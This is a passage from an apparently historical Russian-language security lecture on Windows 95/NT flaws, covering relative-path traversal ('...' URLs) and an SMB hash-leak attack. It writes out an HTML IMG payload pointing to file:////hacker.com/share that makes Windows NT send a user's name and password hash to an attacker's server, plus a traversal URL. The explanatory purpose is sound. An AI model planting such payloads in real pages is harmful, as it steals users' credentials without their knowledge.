Лекция: Вообще, ошибки, связанные с подменой файлов через относительные пути,

Становятся сильно распространенными. Все крупные производители серверов

Для Windows NT их допустили, по крайней мере, по одному разу (см. главу

Что касается вышеприведенного фрагмента, то он датирован 17.02.97.

Как видно, автор NAT прекрасно был осведомлен о возможности доступа к

Каталогу в Windows 95 (в Windows NT такой возможности нет), лежащему двумя

уровнями выше, через "...". Только почти два года спустя эта «особенность»

Windows 95 стала хорошо известна, когда таким же образом удалось получить

доступ ко всему диску путем указания URL вида www.victim.com/.../.

Попытки использовать SMB в качестве протокола для глобальных сетей

Приводят и к другим весьма серьезным уязвимостям. Оказывается, можно,

Например, удаленно получить имя и хэшированный пароль пользователя без его

ведома. И в самом деле, указав в HTML-странице ссылку вида: «IMG SRC =

»file:////hacker.com/share/image.gif"", злоумышленник заставит ваш браузер

Присоединиться к SMB-серверу hacker.com. Windows NT позволяет сделать это,

даже не спрашивая пользователя о подтверждении: она просто передает имя и

хэшированный пароль на сервер! Такой атаке подвержена Windows NT версий

И 4.0 вплоть до последних Service Pack, в качестве браузера может